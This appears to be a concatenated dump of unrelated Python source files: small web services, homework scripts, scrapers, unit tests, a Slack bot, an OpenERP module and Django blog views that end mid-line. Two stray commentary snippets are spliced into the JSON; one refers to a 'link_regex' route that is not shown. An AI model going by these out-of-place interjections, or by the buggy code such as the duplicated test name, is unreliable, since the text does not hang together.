camertp1'\n\nimport writer\nimport cherrypy\nimport sys\nlib_path = '..'\nsys.path.append(lib_path)\nimport slacker_config\n\n\"\"\"\n WriterSvc:\n Receives .json from UI contains { \"session_key\": \"sdfh467sdf13423d\", \"body\": \"Hello World!\", \"channel_id\": \"1\" }\n\n Make sure .json is in correct format. 
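The hand-rolled link_regex in the route above is hard to read and easy to fool; parsing the URL and checking its host is usually clearer. A sketch using the standard library -- the accept-only-linkedin.com policy is an illustrative choice, not taken from the original:

from urllib.parse import urlparse

# Sketch: validate that a submitted link points at linkedin.com by parsing
# it, instead of the character-class regex used above.
def is_linkedin_url(link):
    parsed = urlparse(link if '//' in link else '//' + link, scheme='https')
    host = (parsed.hostname or '').lower()
    return host == 'linkedin.com' or host.endswith('.linkedin.com')

for url in ('https://www.linkedin.com/in/someone', 'http://evil.example.com'):
    print(url, '->', is_linkedin_url(url))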
If not, POST error msg to UI\n\n get session_key from .json\n\n send session_key to authorization svc - POST\n\n POST to auth shall return .json containing user_id : { \"user_id\": \"39837124\"}\n\n create .json containing: { \"channel_id\": \"1\", \"user_id\": \"39837124\", \"body\": \"Hello World!\" }\n\n POST new .json to channel svc\n\n check return value of POST\n POST error to UI in case of error\n\"\"\"\n\nclass WriterSvc:\n exposed = True\n\n @cherrypy.tools.json_out()\n @cherrypy.tools.json_in()\n def POST(self):\n json = cherrypy.request.json\n try:\n session_key = json['session_key']\n channel_id = json['channel_id']\n body = json['body']\n\n except IndexError:\n return {'error': 'failed'}\n\n auth_resp = writer.Writer.send({'session_key': session_key}, url['auth'] + \":\" + port['auth'])\n\n if auth_resp.get('error'):\n return {'error': 'failed'}\n else:\n channel_resp = writer.Writer.send({'new_msg': {'channel_id': channel_id,\n 'user_id': auth_resp['user_id'],\n 'message_string': body}},\n url['channels'] + \":\" + port['channels'])\n\n if channel_resp.get('error'):\n return {'error': 'failed'}\n else:\n return {'success message': 'blargh'}\n\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'application/json')],\n }\n }\n cherrypy.config.update({'server.socket_port': port['msg_writer']})\n cherrypy.quickstart(WriterSvc(), '/', conf)","sub_path":"WriteSvc/write_svc.py","file_name":"write_svc.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"419033180","text":"# Starter code for Homework 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week4.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# %%\n# DON'T change this part -- this creates the lists you \n# should use for the rest of the assignment\n# no need to worry about how this is being done now we will cover\n# this in later sections. 
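WriterSvc above delegates to writer.Writer.send, whose implementation is not part of this file. A plausible minimal shape for such a helper -- entirely hypothetical, the real writer module may differ -- would POST the payload as JSON and fold transport errors into the {'error': ...} convention the service already checks:

import requests

# Sketch: hypothetical stand-in for writer.Writer.send as used above --
# POST a JSON payload to a service URL and return the parsed JSON reply.
# The real writer module is not shown, so this shape is an assumption.
def send(payload, url, timeout=5):
    try:
        resp = requests.post(url, json=payload, timeout=timeout)
        resp.raise_for_status()
        return resp.json()
    except requests.RequestException as exc:
        return {'error': str(exc)}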
\n\n# Read the data into a pandas dataframe\ndata = pd.read_table(filepath, sep='\\t', skiprows=30,\n                     names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n                     )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] = data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# Make a numpy array of this data\nflow_data = data[['year', 'month', 'day', 'flow']].to_numpy()\n\n# Getting rid of the pandas dataframe since we won't be using it this week\ndel(data)\n\n# %%\n# Starter Code\n# Count the number of values with flow > 600 and month == 7\nflow_count = np.sum((flow_data[:,3] > 600) & (flow_data[:,1]==7))\n\n# Calculate the average flow for these same criteria\nflow_mean = np.mean(flow_data[(flow_data[:,3] > 600) & (flow_data[:,1]==7),3])\n\nprint(\"Flow meets this criteria\", flow_count, \" times\")\nprint('And has an average value of', flow_mean, \"when this is true\")\n\n# Make a histogram of data\n# Use the linspace function to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=15)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15)\n#Plotting the histogram\nplt.hist(flow_data[:,3], bins = mybins)\nplt.title('Streamflow')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\n\n# Get the quantiles of flow\n# Two different approaches --- you should get the same answer\n# just using the flow column\nflow_quants1 = np.quantile(flow_data[:,3], q=[0,0.1, 0.5, 0.9])\nprint('Method one flow quantiles:', flow_quants1)\n# Or computing on a column by column basis\nflow_quants2 = np.quantile(flow_data, q=[0,0.1, 0.5, 0.9], axis=0)\n# and then just printing out the values for the flow column\nprint('Method two flow quantiles:', flow_quants2[:,3])\n# %%\n# Starting 'my code'\n# print(data)\n# print(flow_count)\nprint(flow_data)\nprint(flow_mean)\nprint(flow_data.size)\nprint(flow_data.shape)\n# %%\n# Testing\n# take flows and compare similar years\n# flow_year = flow_data[:,0]\n# flow_month = flow_data[:,1]\n# flow_flow = flow_data[:,3]\n# print(flow_year)\n# flow_data2 = np.flow_data(flow_data[:,0]flow_data[:,1],\n# test1 = np.append(flow_data[:,0], flow_data[:,1])\n# print(test1)\n\n# del(test1)# %%\n\n# for flow_data[:,1] == 9 in flow_data:\n#     print(flow_data[:,2])\n\n# for i in flow_data:\n#     if flow_data.any[:,1] == 9:\n#         print(flow_data[:,3])\n\n# year =\n\n# flow_data2 = flow_data[(flow_data[:,1]==9), 3]\n# yr1 = flow_data2[1:30]\n\n# print(flow_data2)\n\n# flow_data.index(flow_data[:,1] == 9)\n\n# print(flow_data[:,1] == 9 for flow_data[:,3])\n\n# %%\n# Monday Guess!\nprint(flow_data.size)\nprint(flow_data.shape)\nflow_202009 = flow_data[11571:11585, 3]\nprint(flow_202009)\n\nx = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\nfig9 = plt.figure()\nfig9.patch.set_facecolor('xkcd:mint green')\nplt.plot(x, flow_202009, label='September 2020 flow')\nplt.xlabel('days in September 2020')\nplt.ylabel('flow')\nplt.legend()\nplt.savefig('graphs/flow_202009')\n#%%\n# Make a histogram of data for month 9\nflow_data9 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==9), 3]\nmean9 = np.mean(flow_data9)\nprint(mean9)\n# Use the linspace function to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15)\n#Plotting the histogram\nfig9 = 
plt.figure()\nfig9.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data9[:], bins = mybins)\nplt.title('Streamflow_9')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g9')\n# %%\n# Make a histogram of data for month 10\nflow_data10 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==10), 3]\nmean10 = np.mean(flow_data10)\nprint(mean10)\n# Use the linspace function to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15)\n#Plotting the histogram\nfig10 = plt.figure()\nfig10.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data10[:], bins = mybins)\nplt.title('Streamflow_10')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g10')\n# %%\n# %%\n# Make a histogram of data for month 11\nflow_data11 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==11), 3]\nmean11 = np.mean(flow_data11)\nprint(mean11)\n# Use the linspace function to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15)\n#Plotting the histogram\nfig11 = plt.figure()\nfig11.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data11[:], bins = mybins)\nplt.title('Streamflow_11')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g11')\n# %%\n# Make a histogram of data for month 12\nflow_data12 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==12), 3]\nmean12 = np.mean(flow_data12)\nprint(mean12)\n# Use the linspace function to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15)\n#Plotting the histogram\nfig12 = plt.figure()\nfig12.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data12[:], bins = mybins)\nplt.title('Streamflow_12')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g12')\n# %%\n","sub_path":"assignment_4/Mitchell_HW4.py","file_name":"Mitchell_HW4.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178647544","text":"# coding: utf-8\n# Overview\n# Fetch currency-pair quote data via the 1forge API\n################ Change history ######################\n## 2017/09/13 created\n\n###############################################\n\nimport itertools\nfrom datetime import datetime\nimport math\nimport os\nimport configparser\nimport sys\nimport urllib.request\nimport json\nclass ForgeApi(object):\n\t# Initialization\n\tdef __init__(self,dict):\n\t\t# Read the environment variable.\n\t\tself.homeDir = os.environ[\"APPMONEYTRADE\"]\n\n\t\t# Load the ini config file.\n\t\tself.inifile = dict['util'].inifile\n\n\t\t# Feature ID\n\t\tself.pid = dict['pid']\n\t\tself.utilClass = dict['util']\n\t\t\n\n\t# Fetch prices for all currency pairs.\n\tdef quotesApi(self,key,timeout=7):\n\t\t# Fetch prices for all currency pairs.\n\t\tparelist = self.inifile.get('moneypare','moneypare')\t\n\t\tdata = {}\n\t\tdata['pairs'] = parelist\n\t\tdata['api_key'] = key\n\t\turl_values = urllib.parse.urlencode(data)\n\t\treq = urllib.request.Request(\"https://forex.1forge.com/1.0.3/quotes?\" + url_values,headers={'User-Agent': 'Mozilla/5.0'})\n\n\t\t# Default value for the response\n\t\tresponse = 0\n\t\t# Handle HTTP errors and timeouts\n\t\ttry:\n\t\t\twith urllib.request.urlopen(req,timeout=7) as res:\n\t\t\t\tresponse = 
res.read().decode(\"utf-8\")\n\t\texcept:\n\t\t\tself.utilClass.loggingError('quotesApi is HttpError')\n\n\t\treturn response\n","sub_path":"source/service/forge/ForgeApi.py","file_name":"ForgeApi.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627480602","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nurl = 'https://rate.bot.com.tw/xrt/quote/2020-07/USD'\r\nresponse = requests.get(url).text\r\nsoup = BeautifulSoup(response, features='html.parser')\r\ntr_tags = soup.find_all('tbody')[0].find_all('tr')\r\n\r\nall_days = [['時間','本行買入','本行賣出','即期買入','即期賣出']]\r\nfor tag in tr_tags:\r\n data = tag.text\r\n info = data.split('\\n')[1:-1]\r\n info.pop(1)\r\n all_days.insert(1,info)\r\n\r\nimport csv\r\nfilename = 'rate.csv'\r\nwith open(filename, encoding='Big5', mode='w') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(all_days)\r\n","sub_path":"Day15/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"68468360","text":"import unittest\nfrom client3 import getDataPoint, getRatio\n\n\nclass ClientTest(unittest.TestCase):\n\n def test_getDataPoint_calculatePrice(self):\n quotes = [\n {\n \"top_ask\": {\n \"price\": 121.2,\n \"size\": 36\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 120.48,\n \"size\": 109\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"ABC\",\n },\n {\n \"top_ask\": {\n \"price\": 121.68,\n \"size\": 4\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 117.87,\n \"size\": 81\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"DEF\",\n },\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n quote0 = \"ABC\", 120.48, 121.2, (120.48 + 121.2) / 2\n\n self.assertEqual(getDataPoint(quotes[0]), quote0)\n\n def test_getDataPoint_calculatePriceBidGreaterThanAsk(self):\n quotes = [\n {\n \"top_ask\": {\n \"price\": 119.2,\n \"size\": 36\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 120.48,\n \"size\": 109\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"ABC\",\n },\n {\n \"top_ask\": {\n \"price\": 121.68,\n \"size\": 4\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 117.87,\n \"size\": 81\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"DEF\",\n },\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for quote in quotes:\n expectedResult = (\n quote[\"stock\"],\n quote[\"top_bid\"][\"price\"],\n quote[\"top_ask\"][\"price\"],\n round(((quote[\"top_bid\"][\"price\"] + quote[\"top_ask\"][\"price\"]) / 2),\n 2),\n )\n self.assertEqual(getDataPoint(quote), expectedResult)\n\n \"\"\" ------------ Add more unit tests ------------ \"\"\"\n\n def test_getRatio_calculateRatioAgainstAZeroPrice(self):\n self.assertEqual(getRatio(100, 0), False)\n\n def test_getRatio_caclulateRatioOnFirstPriceZero(self):\n self.assertEqual(getRatio(0, 1233.3), 0)\n\n def test_getRatio_calculateRatioAgainstLess(self):\n self.assertGreater(getRatio(123.32, 53.23), 1)\n\n def test_getRatio_calculateRatioAgainstGreater(self):\n self.assertLess(getRatio(123.32, 153.23), 1)\n\n def test_getRatio_calculateRatioAgainstGreater(self):\n self.assertEqual(getRatio(1, 1), 1)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"client_test.py","file_name":"client_test.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79420956","text":"import json\nimport os\nimport random\nimport time\nfrom urllib.error import HTTPError\n\nfrom bottlenose import api\nfrom bs4 import BeautifulSoup\nfrom slackbot.bot import listen_to\n\n\ndef error_handler(err):\n    ex = err['exception']\n    if isinstance(ex, HTTPError) and ex.code == 503:\n        time.sleep(random.expovariate(0.1))\n        return True\n\n\ndef fetch_book_data(word):\n    key = os.environ['AMAZON_KEY']\n    secret = os.environ['AMAZON_SECRET']\n    tag = os.environ['AMAZON_ASSOCIATE_TAG']\n\n    amazon = api.Amazon(key, secret, tag, Region='JP',\n                        ErrorHandler=error_handler)\n    res = amazon.ItemSearch(Keywords=word, SearchIndex='Books',\n                            ResponseGroup='Medium')\n    res = BeautifulSoup(res, 'lxml')\n\n    if res.totalresults.text == '0':\n        raise RuntimeError('Search results could not be found.')\n\n    return [{\n        'title': res.title.text,\n        'title_link': res.detailpageurl.text,\n        'text': res.author.text,\n        'image_url': res.largeimage.url.text\n    }]\n\n\n@listen_to('^(?:本|ほん|book)[\\s ]+(.*)')\ndef book(message, word):\n    try:\n        message.send_webapi('', json.dumps(fetch_book_data(word)))\n    except RuntimeError:\n        message.send('検索結果が見つかりませんでした :sweat_drops:')\n","sub_path":"kotatsu/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"13073574","text":"\"\"\"\nCompute the greatest common divisor and least common multiple\n\"\"\"\ndef gcd(x, y):\n    if x > y:\n        (x, y) = (y, x)\n    for i in range(x, 1, -1):\n        if x % i == 0 and y % i == 0:\n            return i\n    return 1\ndef lcm(x, y):\n    return x * y // gcd(x, y)\n\nprint(gcd(15, 27))\nprint(lcm(15, 27))\n","sub_path":"day6/function2.py","file_name":"function2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"341428718","text":"def e(s):\n    # count occurrences of each character\n    cs = {}\n    for c in s:\n        if c not in cs:\n            cs[c] = 1\n        else:\n            cs[c] += 1\n    # a string can be permuted into a palindrome iff at most one character count is odd\n    od = 0\n    for c in cs:\n        if cs[c] % 2 != 0:\n            od += 1\n    if od > 1:\n        return 'no'\n    return 'yes'\n\ni = open('problem4.final.txt', 'r')\no = open('grossam2.4.txt', 'w')\ns = i.readline()\nwhile s != '':\n    o.write(e(s[:-1]) + '\\n')\n    s = i.readline()\no.close()\ni.close()\n","sub_path":"submissions/grossam2.4.py","file_name":"grossam2.4.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"201069701","text":"# course: Object-oriented programming, year 2, semester 1\n# academic year: 201920\n# author: B. 
Schoen-Phelan\n# date: 08-10-2019\n# purpose: Lab 3\n\n# import sys\n\nclass WordScramble:\n    def __init__(self):\n        self.user_input = input(\"Please give me a sentence: \")\n        # if self.user_input.isdigit():\n        #     sys.exit(\"We would have needed a word not a number\")\n\n    def scramble(self):\n        # print what was input\n        print(\"The user input was: \", self.user_input)\n\n        # first scramble is just one word\n        # reverse two indices\n        # a particularly good choice is to switch the first two\n        # and the last two\n        # this only makes sense if you have a word that is longer than 3\n        # if len(self.user_input) > 3:\n        #     new_word = self.user_input[0] + self.user_input[2] + self.user_input[1] \\\n        #                + self.user_input[3:]\n        # elif len(self.user_input) <= 3:\n        #     new_word = self.user_input\n        # else:  # here we assume this word is just one character long or the space character\n        #     print(\"try again\")\n        #     new_word = False\n        #\n        # print(new_word)\n\n\n        # one solution for the full sentence\n        sentence = self.user_input.strip().split()\n        #\n        # # Get the word from the sentence\n        for index, word in enumerate(sentence):\n            # check the length of the word > 3\n            if len(word) > 3:\n                # swap the second character with the second-to-last one\n                temp_word = list(word)  # we use a list for item assignment, but could also just use another new string variable\n                if (',' in temp_word) or ('.' in temp_word):\n                    temp = temp_word[1]\n                    temp_word[1] = temp_word[-3]\n                    temp_word[-3] = temp\n                else:\n                    # split the word into a list of characters and swap\n                    # this swap leaves first and last intact\n                    temp = temp_word[1]\n                    temp_word[1] = temp_word[-2]\n                    temp_word[-2] = temp\n\n                # Join the characters together and form the word\n                swapped_word = ''.join(temp_word)\n                # replace the previous word at that position with the new swapped word\n                sentence[index] = swapped_word\n            else:\n                # Since the length of the word is <= 3, don't swap it\n                sentence[index] = word\n\n        # Join all the words with a space\n        the_swap = ' '.join(sentence)\n        # Print word\n        print(the_swap)\n\nword_scrambler = WordScramble()\nword_scrambler.scramble()\n# print(string.punctuation)\n","sub_path":"Labs/lab_3_solution.py","file_name":"lab_3_solution.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"240813033","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04)\n# [GCC 8.4.0]\n# Embedded file name: /Users/will/projects/moya/moya/command/sub/apps.py\n# Compiled at: 2015-11-29 05:52:18\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom ...command import SubCommand\nfrom ...wsgi import WSGIApplication\nfrom ...console import Cell\n\nclass Apps(SubCommand):\n    \"\"\"List project applications\"\"\"\n    help = b'get application information'\n\n    def add_arguments(self, parser):\n        parser.add_argument(b'-l', b'--location', dest=b'location', default=None, metavar=b'PATH', help=b'location of the Moya server code')\n        parser.add_argument(b'-i', b'--ini', dest=b'settings', default=None, metavar=b'SETTINGSPATH', help=b'path to projects settings file')\n        return parser\n\n    def run(self):\n        application = WSGIApplication(self.location, self.get_settings(), disable_autoreload=True, master_settings=self.master_settings)\n        archive = application.archive\n        table = []\n        for name, app in sorted(archive.apps.items()):\n            table.append([\n                name,\n                app.lib.long_name,\n                Cell(app.lib.version, bold=True, fg=b'magenta')])\n\n        
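# Render the collected rows as a console table with the given column headers\n        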
self.console.table(table, [\n b'app', b'lib', b'version'])","sub_path":"pycfiles/moya-0.6.20-py2.py3-none-any/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605010735","text":"import collections\nfrom typing import List\n\nclass Solution:\n def maxSlidingWindow_brute_force(self, nums: List[int], k: int) -> List[int]:\n if not nums:\n return nums\n \n r = []\n for i in range(len(nums) - k + 1):\n r.append(max(nums[i:i+k]))\n\n return r\n\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n results = []\n window = collections.deque()\n current_max = float('-inf')\n for i, v in enumerate(nums):\n window.append(v)\n print(v, window)\n if i < k - 1:\n continue\n\n if current_max == float('-inf'):\n current_max = max(window)\n elif v > current_max:\n current_max = v\n\n results.append(current_max)\n\n if current_max == window.popleft():\n current_max = float('-inf')\n\n return results\n\n\nif __name__ == \"__main__\":\n nums = [1, 3, -1, -3, 5, 3, 6, 7]\n k = 3\n result = Solution().maxSlidingWindow(nums, k)\n for r in result:\n print(r)\n","sub_path":"python/239_Sliding_Window_Maximum.py","file_name":"239_Sliding_Window_Maximum.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"37794021","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Business Applications\n# Copyright (C) 2004-2012 OpenERP S.A. ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\n\nclass stock_config_settings(osv.osv_memory):\n    _inherit = 'stock.config.settings'\n\n    _columns = {\n        'source_loc_id': fields.many2one('stock.location', 'Default Source Location'),\n        'destination_loc_id': fields.many2one('stock.location', 'Default Destination Location')\n    }\n\n    def get_default_source_loc_id(self, cr, uid, fields, context=None):\n        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)\n        company_obj = self.pool.get('res.company')\n        company = company_obj.browse(cr, uid, user.company_id.id)\n        if not company.source_loc_id:\n            source_loc_id = False\n        else:\n            source_loc_id = company.source_loc_id.id\n        return {'source_loc_id': source_loc_id}\n\n    def get_default_destination_loc_id(self, cr, uid, fields, context=None):\n        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)\n        company_obj = self.pool.get('res.company')\n        company = company_obj.browse(cr, uid, user.company_id.id)\n        if not company.destination_loc_id:\n            destination_loc_id = False\n        else:\n            destination_loc_id = company.destination_loc_id.id\n        return {'destination_loc_id': destination_loc_id}\n\n    def execute(self, cr, uid, ids, context=None):\n        res = super(stock_config_settings, self).execute(cr, uid, ids, context=context)\n        user = self.pool.get('res.users').browse(cr, uid, uid, context=context)\n        company_obj = self.pool.get('res.company')\n        company = company_obj.browse(cr, uid, user.company_id.id)\n        config = self.browse(cr, uid, ids[0], context)\n        if config.source_loc_id:\n            company_obj.write(cr, uid, user.company_id.id, {'source_loc_id': config.source_loc_id.id})\n        if config.destination_loc_id:\n            company_obj.write(cr, uid, user.company_id.id, {'destination_loc_id': config.destination_loc_id.id})\n        return res\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"tko_stock_location_default/res_config.py","file_name":"res_config.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"5132433","text":"from django.shortcuts import render, redirect, HttpResponse\nimport json\nimport random\n# Create your views here.\nfrom django.db.models import Count, Avg, Max\nfrom django.contrib import auth\nfrom app01.models import ArticleUpDown, Comment\nfrom app01 import models\nfrom django.http import JsonResponse\nfrom django.db.models import F\nfrom django.db import transaction\nfrom app01.models import Article, UserInfo, Category, Tag, Article2Tag\n\n\ndef login(request):\n    if request.method == \"POST\":\n        user = request.POST.get(\"user\")\n        pwd = request.POST.get(\"pwd\")\n        code = request.POST.get('code')\n        if code.upper() != request.session['random_code'].upper():\n            return render(request, 'login.html', {'msg': \"验证码错误\"})\n        user = auth.authenticate(username=user, password=pwd)\n        if user:\n            auth.login(request, user)\n            return redirect(\"/index/\")\n    return render(request, \"login.html\")\n\n\ndef index(request):\n    article_list = Article.objects.all()\n    return render(request, \"index.html\", {\"article_list\": article_list})\n\n\ndef logout(request):\n    auth.logout(request)\n\n    return redirect(\"/index/\")\n\n\ndef homesite(request, username, **kwargs):\n    \"\"\"\n    Query the user's site, optionally filtered by category, tag or date\n    :param request:\n    :param username:\n    :return:\n    \"\"\"\n\n    # print(\"kwargs\", kwargs)\n\n    # Look up the user object for this site\n    user = UserInfo.objects.filter(username=username).first()\n    if not user:\n        
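# Unknown username: fall back to the 404 template\n        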
return render(request, \"not_found.html\")\n # 查询当前站点对象\n blog = user.blog\n\n # 查询当前用户发布的所有文章\n if not kwargs:\n article_list = Article.objects.filter(user__username=username)\n\n else:\n condition = kwargs.get(\"condition\")\n params = kwargs.get(\"params\")\n\n if condition == \"category\":\n article_list = Article.objects.filter(user__username=username).filter(category__title=params)\n elif condition == \"tag\":\n article_list = Article.objects.filter(user__username=username).filter(tags__title=params)\n else:\n year, month = params.split(\"/\")\n article_list = Article.objects.filter(user__username=username).filter(create_time__year=year,\n create_time__month=month)\n\n if not article_list:\n return render(request, \"not_found.html\")\n\n # # 查询当前站点每一个分类的名称以及对应的文章数\n #\n # cate_list=Category.objects.filter(blog=blog).annotate(c=Count(\"article__title\")).values_list(\"title\", \"c\")\n # print(cate_list)\n #\n # # 查询当前站点每一个标签的名称以及对应的文章数\n #\n # tag_list=Tag.objects.filter(blog=blog).annotate(c=Count(\"article__title\")).values_list(\"title\", \"c\")\n #\n # # 日期归档\n #\n # date_list=Article.objects.filter(user=user).extra(select={\"y_m_date\":\"strftime('%%Y/%%m',create_time)\"}).values(\"y_m_date\").annotate(c=Count(\"title\")).values_list(\"y_m_date\",\"c\")\n # print(date_list)\n\n return render(request, \"homesite.html\", locals())\n\n\ndef article_detail(request, username, article_id):\n user = UserInfo.objects.filter(username=username).first()\n # 查询当前站点对象\n blog = user.blog\n\n article_obj = Article.objects.filter(pk=article_id).first()\n # 显示出当前文章所有的评论\n comment_list = Comment.objects.filter(article_id=article_id)\n\n return render(request, 'article_detail.html', locals())\n\n\ndef digg(request):\n # print(request.POST)\n is_up = json.loads(request.POST.get('is_up'))\n article_id = request.POST.get('article_id')\n user_id = request.user.pk\n response = {'state': True, 'msg': None}\n obj = ArticleUpDown.objects.filter(user_id=user_id, article_id=article_id).first()\n if obj:\n response['state'] = False\n response['handled'] = obj.is_up\n else:\n with transaction.atomic():\n new_obj = ArticleUpDown.objects.create(user_id=user_id, article_id=article_id, is_up=is_up)\n if is_up:\n Article.objects.filter(pk=article_id).update(up_count=F('up_count') + 1)\n else:\n Article.objects.filter(pk=article_id).update(down_count=F('down_count') + 1)\n return JsonResponse(response)\n\n\ndef comment(request):\n # 获取数据\n user_id = request.user.pk\n article_id = request.POST.get(\"article_id\")\n content = request.POST.get(\"content\")\n pid = request.POST.get(\"pid\")\n # 将获取到的数据进行整合,并且生成评论对象\n\n with transaction.atomic():\n comment = Comment.objects.create(user_id=user_id, article_id=article_id, content=content, parent_comment_id=pid)\n Article.objects.filter(pk=article_id).update(comment_count=F(\"comment_count\") + 1)\n\n response = {\"state\": True}\n response[\"timer\"] = comment.create_time.strftime(\"%Y-%m-%d %X\")\n response[\"content\"] = comment.content\n response[\"user\"] = request.user.username\n\n return JsonResponse(response)\n\n\ndef backend(request):\n user = request.user\n article_list = Article.objects.filter(user=user)\n return render(request, \"backend/backend.html\", locals())\n\n\ndef add_article(request):\n if request.method == \"POST\":\n\n title = request.POST.get(\"title\")\n content = request.POST.get(\"content\")\n user = request.user\n cate_pk = request.POST.get(\"cate\")\n tags_pk_list = request.POST.getlist(\"tags\")\n\n from bs4 import BeautifulSoup\n soup = 
